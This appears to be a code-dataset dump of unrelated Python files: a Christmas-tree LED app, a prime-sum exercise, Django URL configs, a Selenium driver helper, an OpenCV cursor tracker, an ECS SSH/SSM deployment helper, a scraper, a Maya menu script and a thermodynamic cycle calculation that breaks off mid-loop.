0, resources=resources, group=\"Lights\"))\n # resources.addRes(Task(\"xmasTreeOnXmas\", SchedTime(month=[12], day=[25], hour=[7], minute=[00]), \"xmasTree\", 1, resources=resources))\n\n # Schedule\n # schedule = Schedule(\"schedule\", tasks=holidayTasks)\n # schedule.addTask(resources[\"xmasLightsOnSunset\"])\n # schedule.addTask(resources[\"xmasLightsOffMidnight\"])\n # schedule.addTask(resources[\"xmasLightsOffSunrise\"])\n # schedule.addTask(resources[\"xmasTreeOnXmas\"])\n\n restServer = RestServer(\"xmastree\", resources, event=stateChangeEvent, label=\"Xmas tree\")\n\n # Start interfaces\n configData.start()\n neopixelInterface.start()\n # schedule.start()\n restServer.start()\n","sub_path":"xmastreeApp.py","file_name":"xmastreeApp.py","file_ext":"py","file_size_in_byte":15192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"544311654","text":"\"\"\"\n Coury Richards\n CodeEval\n For some fun\n 22JUN2015\n\"\"\"\nclass PrimeFinder:\n\n def __init__(self, largest):\n self. prime_list = []\n self.prime_list_len = 0\n self.largest = largest\n \n #Start Getters/Setters\n \n def get_num(self, i):\n return prime_list[i]\n\n def set_largest(self, val):\n self.largest = val\n\n def get_largest(self):\n return self.largest\n\n def set_prime_list_len(self):\n self.prime_list_len = len(self.get_prime_list())\n \n def get_prime_list_len(self):\n return self.prime_list_len\n\n def set_prime_list(self):\n num = 0\n while (self.get_prime_list_len() < self.get_largest()):\n if self.check_prime(num):\n self.prime_list.append(num)\n num += 1\n self.set_prime_list_len()\n\n def get_prime_list(self):\n return self.prime_list\n \n #End Getters/Setters\n\n def check_prime(self,num):\n #0 and 1 are not prime\n if num > 1:\n #Check all the other exceptions\n if self.check_two(num):\n return False\n elif self.check_three(num):\n return False\n elif self.check_five(num):\n return False\n #Check all the numbers ractorials\n else:\n return self.check_factorial(num)\n\n @staticmethod\n def check_two(num):\n if num == 2:\n return False\n elif num % 2 == 0:\n return True\n else: \n return False\n \n @staticmethod\n def check_three(num):\n if num == 3:\n return False\n elif num % 3 == 0:\n return True\n else: \n return False\n \n @staticmethod\n def check_five(num):\n if num == 5:\n return False\n elif num % 5 == 0:\n return True\n else:\n return False\n \n @staticmethod\n def check_factorial(num):\n #Checks the range of factorial for this number\n #If divisible by one then not prime\n for n in range(5, int(num ** 0.5) + 1, 6):\n #These are for troubleshooting\n #print(str(num) + \"%\" + str(n) + \"=\" + str(num % n))\n #print(str(num) + \"%\" + str(n+2) + \"=\" + str(num % (n + 2)))\n if num % n == 0 or num % (n + 2) == 0:\n return False\n return True\n \n def find_prime(self):\n self.set_prime_list()\n\npp = PrimeFinder(1000)\npp.find_prime()\nparr = pp.get_prime_list()\nres = 0\n\nfor n in parr:\n res += n\n\nprint(res)\n\n\n","sub_path":"python/AddPrime/AddPrime.py3","file_name":"AddPrime.py3","file_ext":"py3","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"256451601","text":"from django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n url(r'^home/', views.post_list),\n url(r'^post/(?P[0-9]+)/$', views.post_detail),\n url(r'^new/', views.post_new),\n url(r'^$', views.logar),\n url(r'user_new/', views.user_new),\n url(r'^post/(?P[0-9]+)/edit', views.post_edit),\n url(r'^post/(?P[0-9]+)/delete', views.post_delete),\n]","sub_path":"projeto/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"81670457","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'sblog.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n # url(r'^admin/', include(admin.site.urls)),\n url(r'^loginReg/',include('sblog.apps.login.urls')),\n\n url(r'^',include('sblog.apps.index.urls')),\n)\n","sub_path":"sblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"561421961","text":"#-*- coding:utf8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.ie import webdriver as ie_webdriver\n\nclass DriverTool:\n\n @classmethod\n def get_driver(cls,selenium_hub,browser_type):\n driver=None\n browser_type=browser_type.lower()\n if browser_type=='ie':\n opt = ie_webdriver.Options()\n opt.force_create_process_api = True\n opt.ensure_clean_session = True\n opt.add_argument('-private')\n ie_capabilities = webdriver.DesiredCapabilities.INTERNETEXPLORER.copy()\n ie_capabilities.update(opt.to_capabilities())\n driver = webdriver.Remote(selenium_hub, desired_capabilities=ie_capabilities)\n elif browser_type=='firefox':\n driver = webdriver.Remote(selenium_hub, webdriver.DesiredCapabilities.FIREFOX.copy())\n elif browser_type=='chrome':\n driver = webdriver.Remote(selenium_hub, webdriver.DesiredCapabilities.CHROME.copy())\n else:\n return driver\n driver.maximize_window()\n driver.delete_all_cookies()\n return driver","sub_path":"common/selenium/driverTool.py","file_name":"driverTool.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"651126842","text":"import os\nimport json\nfrom tqdm import tqdm\n\n\ndef create_json(mode='train', root_folder='/home/prokofiev/pytorch/antispoofing/CelebA_Spoof'):\n if mode == 'test':\n list_path = os.path.join(root_folder, 'metas/intra_test/test_label.json')\n save_file = os.path.join(root_folder, 'metas/intra_test/items_test.json')\n else:\n assert mode == 'train'\n list_path = os.path.join(root_folder, 'metas/intra_test/train_label.json')\n save_file = os.path.join(root_folder, 'metas/intra_test/items_train.json')\n indx=0\n items = {}\n with open('small_crops.txt', 'r') as f:\n small_crops = map(lambda x: x.strip(), f.readlines())\n set_ = set(small_crops)\n with open(list_path, 'r') as f:\n data = json.load(f)\n for path in tqdm(data, 'Reading dataset info...', leave=False):\n labels = data[path] # create list with labels\n bbox_path = os.path.join(root_folder, os.path.splitext(path)[0] + '_BB.txt')\n bbox_f = open(bbox_path, 'r')\n bbox_info = bbox_f.readline().strip().split()[0:4]\n bbox = [int(x) for x in bbox_info] # create bbox with labels\n if len(bbox) < 4 or bbox[2] < 3 or bbox[3] < 3: # filter not existing or too small boxes\n print('Bad bounding box: ', bbox, path)\n continue\n if path in set_:\n print('Bad cropp: ', path)\n items[indx] = {'path':path, 'labels':labels, 'bbox':bbox}\n indx += 1\n with open(save_file, 'w') as f:\n json.dump(items, f, indent = 4)\n\n \nif __name__ == '__main__':\n create_json(mode='train')\n create_json(mode='test')\n","sub_path":"create_json.py","file_name":"create_json.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"10993334","text":"import cv2\nimport numpy as np\nimport pyautogui\n\ndef nothing(x):\n pass\n\ndef swap( array, i, j):\n temp = array[i]\n array[i] = array[j]\n array[j] = temp\n\ncap = cv2.VideoCapture(0)\ncv2.namedWindow('Parameters')\n'''\ncv2.createTrackbar('Hue','Parameters',0,255,nothing)\ncv2.createTrackbar('Sat','Parameters',0,255,nothing)\ncv2.createTrackbar('Val','Parameters',0,255,nothing)\n'''\ncenter=(0,0)\n\nwhile(1):\n\n # Take each frame\n ret , frameinv = cap.read()\n frame=cv2.flip( frameinv, 1)\n\n # Convert BGR to HSV\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n# hue = cv2.getTrackbarPos('Hue','Parameters')\n # sat = cv2.getTrackbarPos('Sat','Parameters')\n # val = cv2.getTrackbarPos('Val','Parameters')\n # define range of blue color in HSV\n lower = np.array([100,70,10])\n upper = np.array([140,255,255])\n\n\n # Threshold the HSV image to get only blue colors\n mask = cv2.inRange(hsv, lower, upper)\n _, contour, _ = cv2.findContours( mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n# blurmask = cv2.GaussianBlur( mask, (5,5), 0)\n# _, contourb, _ = cv2.findContours( blurmask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n area = np.zeros([len(contour)])\n\n for i in range(len(contour)):\n area[i] = cv2.contourArea(contour[i])\n\n a = sorted(area,reverse=True)\n \n for i in range(len(contour)):\n for j in range(1):\n if area[i] == a[j]:\n swap(contour, i, j)\n ''' \n area = np.zeros([len(contourb)])\n\n for i in range(len(contourb)):\n area[i] = cv2.contourArea(contourb[i])\n\n a = sorted(area,reverse=True)\n \n for i in range(len(contourb)):\n for j in range(1):\n if area[i] == a[j]:\n swap(contourb, i, j)\n '''\n if len(contour)>0:\n rect = cv2.minAreaRect(contour[0])\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n\n c = rect[0]\n pre_center = center\n center = np.array([int(c[0]),int(c[1])])\n# print center\n cv2.circle(frame, (int(c[0]),int(c[1])), 3, (0,255,255), -1)\n ellipse = cv2.fitEllipse(contour[0])\n cv2.ellipse(frame,ellipse,(0,0,255),2)\n if(abs(pre_center[0]-center[0])>3 and abs(pre_center[1]-center[1])>3):\n pyautogui.moveTo(3*center[0],3*center[1],)\n\n\n# vidContb = cv2.drawContours( frame, contourb[0:2], -1, (0,255,0), 2)\n vidCont = cv2.drawContours( frame, [box], 0, (0,255,0), 2)\n # Bitwise-AND mask and original imaget\n res = cv2.bitwise_and(frame ,frame, mask= mask)\n\n\n# cv2.imshow('contb', vidContb)\n cv2.imshow('cont', vidCont)\n# cv2.imshow('res',res)\n\n k = cv2.waitKey(5) & 0xFF\n if k == 27:\n break\n\ncv2.destroyAllWindows()","sub_path":"curtrack1.py","file_name":"curtrack1.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"140208474","text":"import os\nimport random\nimport string\nimport subprocess\nfrom tempfile import NamedTemporaryFile\n\n\nclass SSMProvider():\n\n def __init__(self, service):\n self.service = service\n self.host_instance = self.service.host_instance\n\n def ok_to_run(self):\n if self.service.host_instance:\n return True\n return False\n\n def get_ssh_command(self, verbose_flag, instance=None): \n if instance:\n host_instance = instance.id\n else:\n host_instance = self.host_instance\n cmd = 'ssh -t {} ec2-user@{}'.format(verbose_flag, host_instance)\n return cmd\n\n def get_docker_exec_sub_command(self):\n cmd = '\\'/usr/bin/docker exec -it `/usr/bin/docker ps --filter \"name=ecs-{}*\" -q` bash \\''\n return cmd\n\n def get_tunnel_command(self, host, local_port, host_port, ecs_host):\n cmd = 'ssh -N -L {}:{}:{} {}'.format(local_port, host, host_port, ecs_host)\n return cmd\n\n def push_command(self, name, run=False):\n if run:\n return '\"cat > {};bash {};rm {}\"'.format(name, name, name)\n return '\"cat > {}\"'.format(name)\n\n\nclass BastionProvider():\n\n def __init__(self, service):\n self.service = service\n\n def ok_to_run(self):\n if self.service.host_ip and self.service.bastion:\n return True\n return False\n\n def get_ssh_command(self, verbose_flag, instance=None):\n if instance:\n ssh_host_ip = instance.ip\n else:\n ssh_host_ip = self.service.host_ip\n cmd = 'ssh {} -o StrictHostKeyChecking=no -A -t ec2-user@{} ssh {} -o StrictHostKeyChecking=no -A -t {}'.format(verbose_flag, self.service.bastion, verbose_flag, ssh_host_ip)\n return cmd\n\n def get_docker_exec_sub_command(self):\n cmd = \"\\\"/usr/bin/docker exec -it '\\$(/usr/bin/docker ps --filter \\\"name=ecs-{}*\\\" -q)' bash\\\"\"\n return cmd\n\n def get_tunnel_command(self, host, local_port, host_port, ecs_host):\n interim_port = random.randrange(10000, 64000, 1)\n host_ip, bastion = self.service._get_host_bastion(ecs_host)\n cmd = 'ssh -L {}:localhost:{} ec2-user@{} ssh -L {}:{}:{} {}'.format(local_port, interim_port, bastion, interim_port, host, host_port, host_ip)\n return cmd\n\n def push_command(self, name, run=False):\n if run:\n return '\"cat \\> {}\\;bash {}\\;rm {}\"'.format(name, name, name)\n return '\"cat \\> {}\"'.format(name)\n\n\nclass SSH():\n\n def __init__(self, service, ssm=False):\n self.service = service\n self.service._search_hosts()\n\n if ssm:\n self.provider = SSMProvider(service)\n else:\n self.provider = BastionProvider(service)\n\n def __is_or_has_file(self, data):\n '''\n Figure out if we have been given a file-like object as one of the inputs to the function that called this.\n Is a bit clunky because 'file' doesn't exist as a bare-word type check in Python 3 and built in file objects\n are not instances of io. in Python 2\n\n https://stackoverflow.com/questions/1661262/check-if-object-is-file-like-in-python\n Returns:\n Boolean - True if we have a file-like object\n '''\n if (hasattr(data, 'file')):\n data = data.file\n\n try:\n return isinstance(data, file)\n except NameError:\n from io import IOBase\n return isinstance(data, IOBase)\n\n def push_remote_text_file(self, input_data=None, run=False, file_output=False, instance=None):\n \"\"\"\n Push a text file to the current remote ECS cluster instance and optionally run it.\n\n :param input_data: Input data to send. Either string or file.\n :param run: Boolean that indicates if the text file should be run.\n :param file_output: Boolean that indicates if the output should be saved.\n :return: tuple - success, output\n \"\"\"\n if self.__is_or_has_file(input_data):\n path, name = os.path.split(input_data.name)\n else:\n name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))\n\n cmd = self.provider.push_command(name, run)\n\n with_output = True\n if file_output:\n with_output = NamedTemporaryFile(delete=False)\n output_filename = with_output.name\n\n success, output = self.ssh(command=cmd, with_output=with_output, input_data=input_data, instance=instance)\n if file_output:\n output = output_filename\n return success, output\n\n def run_remote_script(self, lines, file_output=False, instance=None):\n \"\"\"\n Run a script on the current remote ECS cluster instance.\n\n :param lines: list of lines of the script.\n :param file_output: Boolean that indicates if the output should be saved.\n :return: tuple - success, output\n \"\"\"\n data = '\\n'.join(lines)\n return self.push_remote_text_file(input_data=data, run=True, file_output=file_output, instance=instance)\n\n def _run_command_with_io(self, cmd, output_file=None, input_data=None):\n success = True\n\n if output_file:\n stdout = output_file\n else:\n stdout = subprocess.PIPE\n\n if input_data:\n if self.__is_or_has_file(input_data):\n stdin = input_data\n input_string = None\n else:\n stdin = subprocess.PIPE\n input_string = input_data\n else:\n stdin = None\n\n try:\n p = subprocess.Popen(cmd, stdout=stdout, stdin=stdin, shell=True, universal_newlines=True)\n output, errors = p.communicate(input_string)\n except subprocess.CalledProcessError as err:\n success = False\n output = \"{}\\n{}\".format(err.cmd, err.output)\n output = err.output\n\n return success, output\n\n def cluster_run(self, cmd):\n \"\"\"\n Run a command on each of the ECS cluster machines.\n\n :param cmd: Linux command to run.\n\n :return: list of tuples\n \"\"\"\n instances = self.service.get_instances()\n responses = []\n for instance in instances:\n success, output = self.run_remote_script(cmd, instance=instance)\n responses.append((success, output))\n return responses\n\n\n def ssh(self, command=None, is_running=False, with_output=False, input_data=None, verbose=False, instance=None):\n \"\"\"\n :param is_running: only complete the ssh if a task from our service is\n actually running in the cluster\n :type is_running: boolean\n \"\"\"\n\n if is_running and not self.service.is_running:\n return\n\n if self.provider.ok_to_run():\n if verbose:\n verbose_flag = \"-vv\"\n else:\n verbose_flag = \"-q\"\n cmd = self.provider.get_ssh_command(verbose_flag, instance)\n if command:\n cmd = \"{} {}\".format(cmd, command)\n\n if with_output:\n if self.__is_or_has_file(with_output):\n output_file = with_output\n else:\n output_file = None\n return self._run_command_with_io(cmd, output_file=output_file, input_data=input_data)\n\n subprocess.call(cmd, shell=True)\n\n def docker_exec(self, verbose=False):\n \"\"\"\n Exec into a running Docker container.\n \"\"\"\n # command = '\\'/usr/bin/docker exec -it `/usr/bin/docker ps --filter \"name=ecs-{}*\" -q` bash \\''\n command = self.provider.get_docker_exec_sub_command()\n command = command.format(self.service.family)\n self.ssh(command, is_running=True, verbose=verbose)\n\n def tunnel(self, host, local_port, host_port):\n \"\"\"\n Open tunnel to remote system.\n :param host:\n :param local_port:\n :param host_port:\n :return:\n \"\"\"\n hosts = self.service._get_cluster_hosts()\n ecs_host = hosts[list(hosts.keys())[0]]\n cmd = self.provider.get_tunnel_command(host, local_port, host_port, ecs_host)\n subprocess.call(cmd, shell=True)\n\n\nclass SSHConfig():\n\n def __init__(self, service, config):\n self.service = service\n self.proxy = 'bastion'\n ssh_yml = config.get_global_config('ssh')\n if ssh_yml:\n if 'proxy' in ssh_yml:\n self.proxy = ssh_yml['proxy']\n if 'ssh' in service.yml:\n if 'proxy' in service.yml['ssh']:\n self.proxy = service.yml['ssh']['proxy']\n\n def get_ssh(self):\n ssh = SSH(self.service, self.proxy=='ssm')\n return ssh\n","sub_path":"deployfish/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":8752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"590004601","text":"#curl http://gigazine.net/news/20160604-anime-2016summer/ > htmls/2016summer.html\n\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nfrom pprint import pprint\nimport csv\nimport time\n\ncours_id = 15\nid_start = 570\n\nargvs = sys.argv\n\ninput_file = argvs[1]\n\nhtml = open(input_file)\n\nbsObj = BeautifulSoup(html.read(), \"html.parser\")\n\nanime_list = bsObj.find_all(\"hr\")\n\n#pprint(anime_list)\n\nbases = []\n\nfmt = '%Y-%m-%d %H:%M:%S'\nnow = time.strftime(fmt, time.localtime())\n\nfor anime in anime_list:\n\n try:\n base = {}\n\n base['public_url'] = anime.find(\"a\").get(\"href\")\n\n base['title'] = anime.find(\"a\").get_text()\n\n print (base['title'])\n #twitter_account = anime.find_next(\"a\", {\"href\" : re.compile(\".+twitter.+\")})\n twitter_account = anime.find_next(string=re.compile(\"ハッシュタグ\")).find_previous(\"a\")\n\n pprint(twitter_account)\n\n twitter_account_save = \"\"\n hash_tag_save = \"\"\n\n check_index = twitter_account.find_previous(\"hr\").find(\"a\").get_text()\n\n if base['title'] == check_index:\n twitter_account_text = twitter_account.get(\"href\")\n twitter_account_save = re.sub('https://twitter.com/', '', twitter_account_text)\n else:\n twitter_account = anime.find_next(string=re.compile(\"Twitter:\")).find_next(\"a\")\n check_index = twitter_account.find_previous(\"hr\").find(\"a\").get_text()\n if base['title'] == check_index:\n twitter_account_text = twitter_account.get(\"href\")\n twitter_account_save = re.sub('https://twitter.com/', '', twitter_account_text)\n\n\n check_index = twitter_account.find_next(string=re.compile(\"ハッシュタグ\")).find_previous(\"hr\").find(\"a\").get_text()\n\n if base['title'] == check_index:\n hash_tag = twitter_account.find_next(string=re.compile(\"ハッシュタグ\"))\n hash_tag_save = re.sub('\\nハッシュタグ:#', '', hash_tag)\n\n base['id'] = id_start\n id_start += 1\n base['cours_id'] = cours_id\n base['sequel'] = 0\n base['sex'] = 0\n base['created_at'] = now\n base['updated_at'] = now\n\n base['twitter_account'] = twitter_account_save\n base['twitter_hash_tag'] = hash_tag_save\n\n bases.append(base)\n\n except Exception as e:\n print (e)\n\n#pprint(bases)\n\n\nwith open(input_file + \".csv\", 'wt') as fout:\n cout = csv.DictWriter(fout, ['id', 'title', 'public_url', 'twitter_account','twitter_hash_tag','facebook','cours_id','created_at','updated_at','sex','sequel'])\n cout.writeheader()\n cout.writerows(bases)\n\n\n\n\n","sub_path":"gigazine_anime_2017_summer.py","file_name":"gigazine_anime_2017_summer.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418688652","text":"# coding:utf-8\r\n'''\r\nCreated on 2016. 11. 20.\r\n\r\n@author: kyuho_choi\r\n'''\r\n\r\nimport pymel.core as pm\r\n\r\n\r\nATTRNAME = 'luffyRigType'\r\nPOPUPNAME = 'Luffy_popupUI'\r\ndef createBodyMenu(node, name):\r\n pm.setParent(POPUPNAME, m=True)\r\n pm.menuItem(boldFont=True, l=name )\r\n pm.menuItem(d=True)\r\n pm.menuItem(l='import', c=pm.Callback(core.importDefaultHuman) )\r\n pm.menuItem(l='Reset Joints', c=pm.Callback(core.reset) )\r\n pm.menuItem(d=True)\r\n pm.menuItem(l='Set Default Rotation', c=pm.Callback(core.setDefaultRotation) )\r\n pm.menuItem(d=True)\r\n pm.menuItem(l='Set Mirror Pose', c=pm.Callback(core.mirrorPose) )\r\n pm.menuItem(l='Set Break Mirror', c=pm.Callback(core.breakMirror) )\r\n \r\n\r\n\r\n\r\n#===============================================================================\r\n#\r\n# DoNotTouch\r\n#\r\n#===============================================================================\r\ndef overrideDagMenuProc():\r\n ''' 팝업메뉴 삭제하고, 마우스 오버된 지오메트리 이름을 리턴, 메뉴 커멘드에서 이름 추출함 '''\r\n # 마우스가 dagObject를 클릭, ....???\r\n pm.dagObjectHit(menu=POPUPNAME)\r\n \r\n # 챠일드 메뉴 목록을 얻고.\r\n popChildren = pm.popupMenu(POPUPNAME, query=True, itemArray=True)\r\n # print \"popChildren:\",popChildren\r\n # Result : popChildren: [u'menuItem3927', u'menuItem3928', u'menuItem3929', u'menuItem3930', u'menuItem3931', u'menuItem3932', u'menuItem3933', u'menuItem3934', u'menuItem3937', u'menuItem3938', u'menuItem3939', u'menuItem3940', u'menuItem3941', u'menuItem3942', u'menuItem3943', u'menuItem3944', u'menuItem3945', u'menuItem3946', u'menuItem3947', u'menuItem3948', u'menuItem3949', u'menuItem3950', u'menuItem3951', u'menuItem3952', u'menuItem3953', u'menuItem3954', u'menuItem3955', u'menuItem3956', u'menuItem3957', u'menuItem3958', u'menuItem3959', u'menuItem3960', u'menuItem3961', u'menuItem3962', u'menuItem3963', u'menuItem3964', u'menuItem3965', u'menuItem3966', u'menuItem3967', u'menuItem3968', u'menuItem3969', u'menuItem3970', u'menuItem3971', u'menuItem3972']\r\n \r\n # 0번째 메뉴아이템의 명령어를 얻고.\r\n \r\n command = pm.menuItem(popChildren[0], query=True, command=True)\r\n # print \"command:\",command\r\n # Result : command: showEditor geo\r\n \r\n # 명령어의 마지막문자를 얻고.\r\n # fullName: geo\r\n fullName = command.split(' ')[-1]\r\n # print \"fullName:\",fullName\r\n # Result : fullName: geo\r\n \r\n # 중요 : 팝업메뉴 삭제\r\n pm.popupMenu(POPUPNAME, edit=True, deleteAllItems=True)\r\n \r\n # 지오메트리 이름 리턴\r\n return fullName\r\n\r\ndef postMenuCommand(*args):\r\n # 이미 팝업메뉴가 존재하면 삭제\r\n if pm.popupMenu(POPUPNAME, exists=True):\r\n pm.popupMenu(POPUPNAME, edit=True, deleteAllItems=True)\r\n\r\n # Make our menu the current menu for any new children:\r\n # 새로새성될 우리 메뉴를 위한 챠일드세팅\r\n pm.setParent(POPUPNAME, menu=True)\r\n \r\n # 마우스가 dagObject를 클릭한 경우\r\n if pm.dagObjectHit():\r\n \r\n # 팝업메뉴를 삭제하고, 지오메트리 명을 리턴받음.\r\n fullObjectName = overrideDagMenuProc()\r\n \r\n # 파이노드로 캐스팅\r\n node = pm.PyNode(fullObjectName)\r\n \r\n # 네임스페이스가 분리된 오브젝트 이름 추출\r\n nodeName = node.name()\r\n withoutNamespace = nodeName.rpartition(':')[2]\r\n #print withoutNamespace\r\n \r\n # 우리가 지정한 어트리뷰트 이름을 가지고 있으면\r\n if node.hasAttr(ATTRNAME):\r\n createBodyMenu(node, withoutNamespace)\r\n \r\n else:\r\n pm.menuItem(label='No object under cursor')\r\n\r\ndef popupMenu():\r\n ''' popupMenu 엔트리 포인트 '''\r\n # 이미 팝업메뉴가 존재하면 삭제\r\n if pm.popupMenu(POPUPNAME, exists=True):\r\n pm.deleteUI(POPUPNAME)\r\n\r\n # shift + alt + RMB시 팝업 생성\r\n pm.popupMenu(POPUPNAME,\r\n button=3,\r\n shiftModifier=True,\r\n altModifier=True,\r\n markingMenu=True,\r\n parent='viewPanes',\r\n postMenuCommand=postMenuCommand)","sub_path":"luffy/popup.py","file_name":"popup.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"436317756","text":"import numpy as np\nimport random\nfrom matplotlib import pyplot as plt\nimport nltk\nimport pandas as pd\nfrom Statistic import make_csv\n\n\n# Вывод графика\ndef show_classifiers_stat(classifier_list, number_of_iterations, set, train_set_size):\n # Adding labels for charts\n def P_autolabel(rects):\n # attach some text labels\n global ax\n for rect in rects:\n height = rect.get_height()\n ax.text(rect.get_x() + rect.get_width() / 4., 1.05 * height,\n '%10.2f' % height,\n ha='center', va='bottom')\n\n # Creates a dictionary\n def get_info(classifier, accuracy):\n array = np.array(accuracy)\n classifier.low = array.min()\n classifier.high = array.max()\n classifier.mean = array.mean()\n classifier.get_diff()\n info[classifier.title] = classifier\n\n accuracy = []\n info = {}\n # Grabbing statistics from all classifiers\n for classifier in classifier_list:\n clean_classifier = classifier\n for i in range(number_of_iterations):\n random.shuffle(set)\n training_set = set[:train_set_size]\n testing_set = set[train_set_size:]\n classifier.classifier.train(training_set)\n accuracy.append(nltk.classify.accuracy(classifier.classifier, testing_set))\n classifier = clean_classifier\n get_info(classifier, accuracy)\n\n # Drawing\n label = []\n lowl = [x.low for x in info.values()]\n highl = [x.high for x in info.values()]\n meanl = [x.mean for x in info.values()]\n diffl = [x.difference for x in info.values()]\n for i in classifier_list:\n label.append(i.title)\n df = pd.DataFrame({\n 'Low': lowl,\n 'High': highl,\n 'Mean': meanl,\n 'Difference': diffl\n }, index = label)\n make_csv(info)\n df.plot(kind='bar', title='Accuracy', use_index=True, colormap = 'viridis')\n plt.show()\n","sub_path":"Visual.py","file_name":"Visual.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"55981669","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 31 22:01:28 2018\n\n@author: Alex Snouffer\n\"\"\"\n\nimport sympy\nimport cantera\nfrom matplotlib import pyplot\nimport numpy\n\ndef h_OutCompressor(n_c, hOI, hI):\n \"\"\"\n \"\"\"\n (n_comp, hOutIsentropic, hIn, \n hOutActual) = sympy.symbols('n_comp hOutIsentropic hIn hOutActual')\n \n eEff = sympy.Eq(n_comp, (hOutIsentropic - hIn)/(hOutActual - hIn))\n e_h_Out = sympy.solve(eEff, hOutActual)\n h_Out = e_h_Out[0].evalf(subs = {n_comp: n_c, hOutIsentropic: hOI, \n hIn: hI})\n return h_Out\n\ndef h_OutTurbine(n_t, hOI, hI):\n \"\"\"\n \"\"\"\n (n_turbine, hOutIsentropic, hIn, \n hOutActual) = sympy.symbols('n_turbine hOutIsentropic hIn hOutActual')\n \n eEff = sympy.Eq(n_turbine, (hIn - hOutActual)/(hIn - hOutIsentropic))\n e_h_Out = sympy.solve(eEff, hOutActual)\n h_Out = e_h_Out[0].evalf(subs = {n_turbine: n_t, hOutIsentropic: hOI, \n hIn: hI})\n return h_Out\n\ndef atm2Pa(P):\n P = P * 101325\n return P\n\ndef rev_irrev(hin, hout, sin, sout, Tin, Qin, Qout, mdotratio):\n To = 300\n irrev = mdotratio * (Qout + To * (sout - sin))\n rev = mdotratio * ((hin - hout) - To * (sin - sout) + Qin * (1 - (To/Tin)))\n rev_irrev_ans = [rev, irrev]\n return rev_irrev_ans\n \n# Brayton Cycle Paramters\nn_comp_Brayton = 0.8\nn_turbine_Brayton = 0.85\nn_heatExchanger = 0.86\nn_pump_Rankine = 0.9\nn_turbine_Rankine = 0.9\n\nW_NET = []\nmassRatio = []\nQ_In = []\nQ_Out = []\nn_thermal = []\n\np5 = []\np6 = []\np7 = []\np8 = []\np9 = []\np1 = []\np2 = []\np3 = []\np4 = []\n\nt5 = []\nt6 = []\nt7 = []\nt8 = []\nt9 = []\nt1 = []\nt2 = []\nt3 = []\nt4 = []\n\ns5 = []\ns6 = []\ns7 = []\ns8 = []\ns9 = []\ns1 = []\ns2 = []\ns3 = []\ns4 = []\n\nh5 = []\nh6 = []\nh7 = []\nh8 = []\nh9 = []\nh1 = []\nh2 = []\nh3 = []\nh4 = []\n\nx3 = []\n\nWrev12 = []\nWrev23 = []\nWrev34 = []\nWrev41 = []\nWrev56 = []\nWrev67 = []\nWrev78 = []\nWrev89 = []\n\nW12a = []\nW23a = []\nW34a = []\nW41a = []\nW56a = []\nW67a = []\nW78a = []\nW89a = []\n\nri12 = []\nri23 = []\nri34 = []\nri41 = []\nri56 = []\nri67 = []\nri78 = []\nri89 = []\n\nfor pr in range(30, 201, 1):\n #Initial State of Brayton\n air5 = cantera.Solution('air.cti')\n p5.append(atm2Pa(1))\n t5.append(300)\n air5.TP = t5[-1], p5[-1]\n \n s5.append(air5.entropy_mass)\n h5.append(air5.enthalpy_mass)\n \n #State after Compressor\n air6 = cantera.Solution('air.cti')\n p6.append(atm2Pa(pr/10))\n air6.SP = s5[-1], p6[-1]\n t6.append(air6.T)\n \n h6_IS = air6.enthalpy_mass\n h6.append(h_OutCompressor(n_comp_Brayton, h6_IS, h5[-1]))\n air6.HP = h6[-1], p6[-1]\n s6.append(air6.entropy_mass)\n \n #State before Turbine (After Combustion)\n air7 = cantera.Solution('air.cti')\n p7.append(p6[-1])\n t7.append(1400)\n air7.TP = t7[-1], p7[-1]\n s7.append(air7.entropy_mass)\n\n h7.append(air7.enthalpy_mass)\n \n #State after Turbine\n air8 = cantera.Solution('air.cti')\n p8.append(p5[-1])\n air8.SP = s7[-1], p8[-1]\n h8_IS = air8.enthalpy_mass\n h8.append(h_OutTurbine(n_turbine_Brayton, h8_IS, h7[-1]))\n air8.HP = h8[-1], p8[-1]\n t8.append(air8.T)\n s8.append(air8.entropy_mass)\n \n #State After HRSG\n air9 = cantera.Solution('air.cti')\n p9.append(atm2Pa(1))\n t9.append(450)\n air9.TP = t9[-1], p9[-1]\n h9.append(air9.enthalpy_mass)\n s9.append(air9.entropy_mass)\n \n #State after the Condensor\n water1 = cantera.Water()\n p1.append(5 * 10**3)\n water1.PX = p1[-1], 0.0\n \n 